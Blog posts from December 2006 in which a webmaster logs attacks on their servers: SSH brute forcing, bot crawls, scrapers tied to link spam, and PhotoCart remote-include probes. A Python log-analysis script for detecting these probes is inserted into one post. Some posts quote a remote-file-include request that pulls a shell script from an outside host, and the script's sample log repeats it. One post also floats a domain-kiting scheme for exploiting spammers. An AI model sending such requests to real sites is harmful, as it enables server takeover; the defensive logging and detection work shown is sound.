Saturday, December 16, 2006

Compromised Within My Own Data Center

Today was interesting as I noticed a couple of servers within my own data center taking aim at my servers. One IP address was attempting a bazillion user names and passwords on SSH and the other IP address was scanning pages on the web server. Now scanning pages on the web server isn't such a big deal, but when I went to look at the server and see who they were, it attempted to inject a virus into my computer using a browser vulnerability.

Just finished reporting both incidents to the support staff at the hosting company and we'll wait and see how they respond. If they leave the virus-injecting server online I will probably have to take my business elsewhere, as that's just not cool, and of course everyone will find out who they are and what they said at that point.

Now we wait...

Friday, December 15, 2006

New Crawling From EV1Servers

No clue what this is or who it's related to yet, but it's definitely a bot of some sort doing a crawl distributed over a d-block at EV1. Since it was from their data center it was already blocked and fed breadcrumb pages to see where the data shows up, if ever.

Here's the alarm it set off...

PROXIMITY ALERT!
209.85.54. [ev1s-209-85-54-130.ev1servers.net.]

209.85.54.130 pages 6- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.132 pages 4- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.134 pages 2- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.135 pages 5- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.137 pages 2- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.138 pages 2- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.139 pages 3- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.140 pages 3- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.143 pages 1- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
209.85.54.146 pages 3- Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Now we just sit back and watch to see where this info pops up, as it could always be just a data mining operation that never shows up in the index.

Thursday, December 14, 2006

Next Wave PhotoCart Attack With New Domain

These assholes just don't stop trying this PhotoCart vulnerability; it's quite idiotic since it didn't work the last few thousand times they hit my site.

They have a new domain:

http://www.wnydir.com/c.in

Which currently proclaims:

Bandwidth Limit Exceeded
The server is temporarily unable to service your request due to the site owner reaching his/her bandwidth limit. Please try again later.

Keep an eye on it, probably will be back up later or tomorrow, who knows.

These botnet guys obviously aren't the smartest tacks on the cork board, picking a domain with throttled bandwidth to work from, but it's probably a hacked site and now that poor customer has no clue he's offline due to vandalism.

Here's the list of attackers so far today:
I wonder what compromised site they'll be using tomorrow?

Spam Kiting?

Someone I know just wrote an article about domain kiting and how he used to get domains for 5 days for free as long as you canceled them within 5 days. This triggered a memory, as I remember writing about some spammers that were trying to bombard me with links to domains that didn't even exist yet, not registered to be exact. Then the domains became active suddenly to reap the rewards of the previous blog spamming, and most of them tended to vanish within a few days.

With all of this information inside my head it collided and bubba had a thought...

SPAM KITING!

Makes perfect sense too since many spammer domains get whacked in a couple of days as people complain to the web host.

So why not just use a domain for 5 days for free and cancel it?

You get rewarded for spamming for a bunch of domains you got completely for FREE, and you don't get stuck holding the bag with a bunch of useless blacklisted domains, most likely in a Google penalty box at that point.

Now a truly evil genius [looks in mirror] would write a script that checks to see if the domains in the attempted spams are registered and registers them if they don't exist, then cancels them all 5 days later automatically. That way, the site being abused by the spam could take advantage of the spammer's efforts, and there is no connection between the spammer and the domain name except the existence of the spam linking to the domain.

I need to check my logs and see if the idiots that used to spam me with unregistered domains are still hard at work as I see some fun to be had!

Another Made For AdSense Scraper Linked to Umax Link Spammer

Another one of the Made For AdSense sites got caught in my snare and sure enough this one also was tied to a huge list of MFA sites and some porn spam sites as well.

Check this out:

http://www.digitbytes.com/

Did a little more research on the source of this scraping:

IP Address: 66.199.247.42
User Agent: lwp-trivial/1.41

It sounded familiar, and sure enough it's the same IP address as a previous scraper I wrote about from umax-ppc.net (66.199.247.42), which previously had some virus injection stuff on their server, but I didn't check this time so beware.

Same IP as before, same user agent, still operating from the same location where they were previously hosting sites that injected a virus. It's simply amazing that this stuff is allowed to continue to operate within US data centers, or any data centers for that matter, as it's obvious the hosting companies are more concerned about their bottom line than their reputations or these guys wouldn't have a host.

I used this cool tool to get a list of all the link spam domains currently hosted on that server and it's a staggering list.
Found 730 websites with the IP 66.199.247.42

Just pick a random domain name out of the list and see how much spam you can find in the search engines all related to this single domain. This group does it all, from guestbook spam to membership profile spam; it's a one-stop spam shop.

Note that the purpose of most of these domains is to redirect you to a free parked page on FREEYAHO, which appears to be where they make their money.

What a twisted web of MFA, spam and domain parks they've woven.

Wednesday, December 13, 2006

Escalating PhotoCart Vulnerability Attack

I thought this silly little phase had passed and these morons had given up, since there were only a few attempts after my last post. Sadly, that wasn't the case, and when I got up this morning and checked the site stats I found they had mounted an even bigger attack than before.

This is all good; just keep coming at my site and exposing the size of your network, because you're just proving Forrest Gump's mother correct: "Stupid is as stupid does."

Here's the path they desperately want, which doesn't exist on my server:

GET /PhotoCart/adminprint.php?path=http://panoplanet.com/c.in?

[UPDATE: It appears panoplanet.com has been taken down within the last couple of hours so you can't see the script anymore. Here are some links to show they were attacking others for a variety of things.]

Note that this is the script they are attempting to inject, which appears to give them shell access from a casual glance at the code.
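As an added illustration (not the author's own tooling, which the posts never show), the following Python reads Apache combined-format access log lines and implements both checks these posts describe: flagging requests that pass a full URL in a query parameter, the shape of the PhotoCart adminprint.php?path=http://... probe above, and grouping hits by /24 to raise a proximity alert like the EV1Servers one in the December 15 post when several addresses in one block crawl with an identical user agent. The log lines, the addresses and the attacker.example host are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access log (combined format).  Addresses are documentation
# ranges and attacker.example is a placeholder; the request shape and the
# libwww-perl / MSIE 5.01 user agents mirror what the posts describe.
SAMPLE_LOG = """\
203.0.113.10 - - [13/Dec/2006:08:01:12 -0800] "GET /PhotoCart/adminprint.php?path=http://attacker.example/c.in? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
203.0.113.11 - - [13/Dec/2006:08:01:14 -0800] "GET /PhotoCart/adminprint.php?path=http://attacker.example/c.in? HTTP/1.1" 404 512 "-" "libwww-perl/5.65"
198.51.100.7 - - [13/Dec/2006:08:02:01 -0800] "GET /blog/index.html HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (X11; Linux)"
192.0.2.130 - - [15/Dec/2006:09:10:00 -0800] "GET /page1.html HTTP/1.0" 200 4096 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.0.2.132 - - [15/Dec/2006:09:10:03 -0800] "GET /page2.html HTTP/1.0" 200 4096 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.0.2.134 - - [15/Dec/2006:09:10:05 -0800] "GET /page3.html HTTP/1.0" 200 4096 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.0.2.137 - - [15/Dec/2006:09:10:09 -0800] "GET /page4.html HTTP/1.0" 200 4096 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.0.2.130 - - [15/Dec/2006:09:10:12 -0800] "GET /page5.html HTTP/1.0" 200 4096 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
"""

# Apache "combined" log format: ip ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_log(text):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def find_remote_include_attempts(entries):
    """Return (ip, ua, path, param, url) for every request whose query string
    hands the script a full URL in some parameter.  That is the signature of
    a remote-include probe such as adminprint.php?path=http://...; a legitimate
    application rarely takes an absolute URL where a local path is expected."""
    hits = []
    for e in entries:
        parts = urlsplit(e["target"])
        for key, val in parse_qsl(parts.query, keep_blank_values=True):
            if val.lower().startswith(("http://", "https://", "ftp://")):
                hits.append((e["ip"], e["ua"], parts.path, key, val))
    return hits


def proximity_alert(entries, min_hosts=3):
    """Group requests by /24 and flag blocks where at least min_hosts distinct
    addresses arrive with the same user agent.  One host per address, the same
    UA across the block and a handful of pages each is the distributed-crawl
    pattern the EV1 alert shows.  Returns {block: {ua: {ip: page_count}}}."""
    by_block = defaultdict(lambda: defaultdict(lambda: defaultdict(int)))
    for e in entries:
        octets = e["ip"].split(".")
        if len(octets) != 4:
            continue  # IPv6 or garbage; a /24 grouping does not apply
        block = ".".join(octets[:3]) + "."
        by_block[block][e["ua"]][e["ip"]] += 1
    alerts = {}
    for block, uas in by_block.items():
        for ua, ips in uas.items():
            if len(ips) >= min_hosts:
                alerts.setdefault(block, {})[ua] = dict(ips)
    return alerts


def format_alert(alerts):
    """Render alerts in the same shape as the alarm quoted in the post."""
    lines = []
    for block, uas in sorted(alerts.items()):
        lines.append("PROXIMITY ALERT! %s" % block)
        for ua, ips in uas.items():
            for ip, n in sorted(ips.items()):
                lines.append("%s pages %d- %s" % (ip, n, ua))
    return lines


def analyze(text, min_hosts=3):
    """Run both detectors over one log text; parse once, since parse_log is lazy."""
    entries = list(parse_log(text))
    return find_remote_include_attempts(entries), proximity_alert(entries, min_hosts)


if __name__ == "__main__":
    rfi, alerts = analyze(SAMPLE_LOG)
    for ip, ua, path, key, url in rfi:
        print("remote-include probe from %s (%s): %s?%s=%s" % (ip, ua, path, key, url))
    for line in format_alert(alerts):
        print(line)
```

The two libwww-perl probes in the sample come from one /24 as well, but with different user agents, so they trip only the remote-include check and not the proximity alert.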


Here are all the sites involved in today's attack:

Maybe it's time I send a few letters to the owners of these compromised servers and see what happens.